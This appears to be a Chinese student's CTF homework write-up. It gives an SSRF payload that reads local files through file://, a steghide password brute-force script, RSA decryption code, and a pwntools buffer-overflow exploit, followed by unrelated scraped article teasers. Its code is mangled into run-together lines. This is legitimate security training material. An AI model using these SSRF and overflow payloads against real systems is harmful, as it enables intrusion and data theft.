2.1作业

embedded/2025/2/24 2:00:47/

1

 #web351curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);echo ($result);

【提示不允许外部】对应源码:$_SERVER(remoteaddr):

?url=http://127.0.0.1/flag.php

伪协议可以读:url=file:///var/www/html/flag.php

2

取反,打开图片获得解压密码(解压得:两张图和一个txt文本)

python">f=open("1.jpg",'rb')
f1=f.read()#二进制形式
with open('flag.jpg','wb') as f2:for i in f1:if i==0:f2.write(bytes([0x0]))#这里的b是int形式,要转换成bytes时,使用bytes(),且里面的内容需要加[]else:f2.write(bytes([0x100-i]))
f.close()
f2.close()

16进制位移

大小写组合爆破?

steghide密码爆破

python">import osdef all_casings(input_string):if not input_string:yield""else:first = input_string[:1]if first.lower() == first.upper():for sub_casing in all_casings(input_string[1:]):yield first + sub_casingelse:for sub_casing in all_casings(input_string[1:]):yield first.lower() + sub_casingyield first.upper() + sub_casingif __name__ =='__main__':for x in all_casings("qsnctf"):os.system("steghide extract -sf 2.jpg -p "+x)print(x)

 

0宽隐写

3

4

import gmpy2
import libnum
from Crypto.Util.number import *
from binascii import a2b_hex, b2a_hexflag = "*****************"
p=109935857933867829728985398563235455481120300859311421762540858762721955038310117609456763338082237907005937380873151279351831600225270995344096532750271070807051984097524900957809427861441436796934012393707770012556604479065826879107677002380580866325868240270494148512743861326447181476633546419262340100453
q=127587319253436643569312142058559706815497211661083866592534217079310497260365307426095661281103710042392775453866174657404985539066741684196020137840472950102380232067786400322600902938984916355631714439668326671310160916766472897536055371474076089779472372913037040153356437528808922911484049460342088834871
e=15218928658178
c=262739975753930281690942784321252339035906196846340713237510382364557685379543498765074448825799342194332681181129770046075018122033421983227887719610112028230603166527303021036386350781414447347150383783816869784006598225583375458609586450854602862569022571672049158809874763812834044257419199631217527367046624888837755311215081173386523806086783266198390289097231168172692326653657393522561741947951887577156666663584249108899327053951891486355179939770150550995812478327735917006194574412518819299303783243886962455399783601229227718787081785391010424030509937403600351414176138124705168002288620664809270046124
n = p * q
phi = (p - 1) * (q - 1)
d = gmpy2.invert(e, phi)
m = pow(c, d, n)
print(libnum.n2s(int(m)))

5

from pwn import *
p = remote("node3.buuoj.cn",5302)
ret_arr = 0X40059A
payload = 'a'*(0x80 + 0x8) + p64(ret_arr)
p.sendline(payload)
p.interactive()


http://www.ppmy.cn/embedded/164720.html

相关文章

【Windows系统node_modules删除失败(EPERM)问题解析与应对方案】

Windows系统node_modules删除失败(EPERM)问题解析与应对方案 问题现象 当开发者尝试删除Node.js项目的node_modules目录时,常会遇到如下错误提示: [Error: EPERM: operation not permitted, unlink D:\project\...\esbuild.exe] {errno: -4048,code: …

x安全服务 y安全体系 z网络安全模型 网络安全体系设计

这一年来,网络安全行业兴奋异常。各种会议、攻防大赛、黑客秀,马不停蹄。随着物联网大潮的到来,在这个到处都是安全漏洞的世界,似乎黑客才是安全行业的主宰。然而,我们看到的永远都是自己的世界,正如医生看…

halcon 条形码、二维码识别、opencv识别

一、条形码 函数介绍 create_bar_code_model * 1.创建条码读取器的模板 * 参数一:通用参数的名称,针对条形码模型进行调整。默认值为空 * 参数二:针对条形码模型进行调整 * 参数三:条形码模型的句柄。 create_bar_code_model (…

Visual Studio 2022配置网址参考

代码格式化和清理冗余代码选项的配置: 代码样式选项和代码清理 - Visual Studio (Windows) | Microsoft Learn 调试时传递参数: 调试时传递命令行参数(C) - Visual Studio (Windows) | Microsoft Learn

学习京东写测试用例

以下是京东等大型电商平台测试用例编写的通用方法论及示例,结合功能模块、测试类型和实际场景进行设计: 一、测试用例设计原则 覆盖全面:覆盖核心业务流程、异常场景、边界条件、用户角色差异。优先级分层: P0(最高&a…

开启开源新时代:DeepSeek引领人工智能技术开放化

DeepSeek开源周:开启AI共享新时代 摘要 DeepSeek近日通过社交平台X宣布,将于下周启动为期五天的开源活动,每天公开一个核心代码库。这一消息迅速引发热议,被认为是人工智能迈向开放共享时代的关键一步。通过释放技术资源&#xff…

OpenAI 周活用户破 4 亿,GPT-4.5 或下周发布,微软加紧扩容服务器

导语: OpenAI 近期用户增长迅猛,其下一代 AI 模型 GPT-4.5 和 GPT-5 的发布也日益临近。微软作为 OpenAI 的重要合作伙伴,正积极扩充服务器容量,为新模型的到来做好准备。 OpenAI 首席运营官布拉德莱特卡普(Brad Lig…

百信银行数字普惠金融架构实践:技术解析与洞察

在金融科技快速发展的今天,百信银行作为国内首家独立法人直销银行,以其AI驱动的数字普惠金融实践,在业界树立了新的标杆。本文将从技术角度深入分析百信银行的数字普惠金融架构实践,探讨其如何通过技术创新实现金融服务的普及与优…